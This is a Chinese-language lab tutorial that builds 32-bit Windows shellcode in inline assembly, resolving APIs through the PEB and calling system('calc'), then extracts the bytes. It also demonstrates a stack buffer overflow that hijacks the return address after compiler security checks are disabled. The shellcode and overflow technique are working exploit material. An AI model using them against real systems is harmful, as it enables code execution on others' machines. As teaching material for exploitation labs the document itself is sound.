首先编写shellcode代码
#include "windows.h"
#include <stdio.h>
#pragma comment(linker,"/SECTION:.data,RWE")
void test()
{
char buf[8];
strcpy_s(buf, sizeof(shellcode), shellcode);
}
void test_shellcode()
{
((void(*)())&shellcode)();
/*__asm
{
lea eax, shellcode;
jmp eax;
}*/
}
unsigned char *asm_code()
{
__asm
{
lea eax, __code
jmp __ret
}
//这里放shellcode的汇编代码
__asm
{
__code:
push ebp;
mov esi, fs:0x30; //PEB
mov esi, [esi + 0x0C]; //+0x00c Ldr : Ptr32 _PEB_LDR_DATA
mov esi, [esi + 0x1C]; //+0x01c InInitializationOrderModuleList : _LIST_ENTRY
next_module:
mov ebp, [esi + 0x08];
mov edi, [esi + 0x20];
mov esi, [esi];
cmp[edi + 12 * 2], 0x00;
jne next_module;
mov edi, ebp; //BaseAddr of Kernel32.dll
//寻找GetProcAddress地址
sub esp, 100;
mov ebp, esp;
mov eax, [edi + 3ch];//PE头
mov edx, [edi + eax + 78h]
add edx, edi;
mov ecx, [edx + 18h];//函数数量
mov ebx, [edx + 20h];
add ebx, edi;
search:
dec ecx;
mov esi, [ebx + ecx * 4];
add esi, edi;
mov eax, 0x50746547;
cmp[esi], eax;
jne search;
mov eax, 0x41636f72;
cmp[esi + 4], eax;
jne search;
mov ebx, [edx + 24h];
add ebx, edi;
mov cx, [ebx + ecx * 2];
mov ebx, [edx + 1ch];
add ebx, edi;
mov eax, [ebx + ecx * 4];
add eax, edi;
mov[ebp + 76], eax;//eax为GetProcAddress地址
//获取LoadLibrary地址
push 0;
push 0x41797261;
push 0x7262694c;
push 0x64616f4c;
push esp
push edi
call[ebp + 76]
mov[ebp + 80], eax;
//获取ExitProcess地址
push 0;
push 0x737365;
push 0x636f7250;
push 0x74697845;
push esp;
push edi;
call[ebp + 76];
mov[ebp + 84], eax;
////////////////////////////////////////////我的代码开始
//获取Sleep地址
push 0x70;
push 0x65656C53;
push esp;
push edi;
call[ebp + 76];
mov[ebp + 88], eax;
//Sleep(10000)
//push 0xFFFFFFFF;
//call[ebp + 88];
///////////////////////////////////////////我的代码结束
//加载msvcrt.dll LoadLibrary("msvcrt")
push 0;
push 0x7472;
push 0x6376736d;
push esp;
call[ebp + 80];
mov edi, eax;
//获取system地址
push 0;
push 0x6d65;
push 0x74737973;
push esp;
push edi;
call[ebp + 76];
mov[ebp + 92], eax;
//system("calc")
push 0;
push 0x636c6163;
push esp;
call[ebp + 92];
//ExitProcess
call[ebp + 84];
}
//函数结语
__asm int 3
__asm { __ret: }
}
int main()
{
unsigned char temp;
int i = 1;
unsigned char *asm_p = asm_code();
FILE *fd = fopen("code.txt", "w");
fprintf(fd, "unsigned char shellcode[] = \"");
while ((temp = *asm_p) != 0xcc)
{
fprintf(fd, "\\x%.2x", temp);
asm_p++;
if (i % 8 == 0) fprintf(fd, "\"\n\"");
i++;
}
fprintf(fd, "\";");
fclose(fd);
/*__asm
{
lea eax, shellcode;
jmp eax;
}*/
//((void(*)())&shellcode)();
return 0;
}
直接运行,之后打开项目所在文件夹,会发现一个code.text文件,打开里面会有已经准备好的unsigned char shellcode[]的初始化。把它放到全局变量里,之后修改main函数代码为
unsigned char shellcode[] = "\x55\x64\x8b\x35\x30\x00\x00\x00"
"\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"
"\x08\x8b\x7e\x20\x8b\x36\x80\x7f"
"\x18\x00\x75\xf2\x8b\xfd\x83\xec"
"\x64\x8b\xec\x8b\x47\x3c\x8b\x54"
"\x07\x78\x03\xd7\x8b\x4a\x18\x8b"
"\x5a\x20\x03\xdf\x49\x8b\x34\x8b"
"\x03\xf7\xb8\x47\x65\x74\x50\x39"
"\x06\x75\xf1\xb8\x72\x6f\x63\x41"
"\x39\x46\x04\x75\xe7\x8b\x5a\x24"
"\x03\xdf\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x03\xdf\x8b\x04\x8b\x03\xc7"
"\x89\x45\x4c\x6a\x00\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68"
"\x4c\x6f\x61\x64\x54\x57\xff\x55"
"\x4c\x89\x45\x50\x6a\x00\x68\x65"
"\x73\x73\x00\x68\x50\x72\x6f\x63"
"\x68\x45\x78\x69\x74\x54\x57\xff"
"\x55\x4c\x89\x45\x54\x6a\x70\x68"
"\x53\x6c\x65\x65\x54\x57\xff\x55"
"\x4c\x89\x45\x58\x6a\x00\x68\x72"
"\x74\x00\x00\x68\x6d\x73\x76\x63"
"\x54\xff\x55\x50\x8b\xf8\x6a\x00"
"\x68\x65\x6d\x00\x00\x68\x73\x79"
"\x73\x74\x54\x57\xff\x55\x4c\x89"
"\x45\x5c\x6a\x00\x68\x63\x61\x6c"
"\x63\x54\xff\x55\x5c\xff\x55\x54"
"";
void hacker()
{
printf("%i", 1);//当该函数被调用时,说明溢出攻击成功了
exit(5);
}
void fun(char *str)
{
char buffer[4];
memcpy(buffer, str, 16);
}
int main()
{
char badStr[] = "000011112222333344445555";//创建了一个24个字节的字符数组
DWORD *pEIP = (DWORD*)&badStr[8];//获取该数组的第八个元素的地址(从第零个开始)
//*pEIP = (DWORD)&shellcode[0];//获取shellcode数据片开头地址
*pEIP = (DWORD)hacker;//获取hacker函数地址(三十二位二进制数),同时赋给pEIP(即修改了badStr的2222变为hacker函数地址)
fun(badStr);//开始攻击
return 0;
}
修改基本运行时检查为默认值,修改缓冲区安全检查为否。
运行程序,发现log窗口中出现 ”程序“[0x202C] console1.exe: 本机”已退出,返回值为 5 (0x5)。
说明执行了exit(5)代码,攻击成功。
实验截图
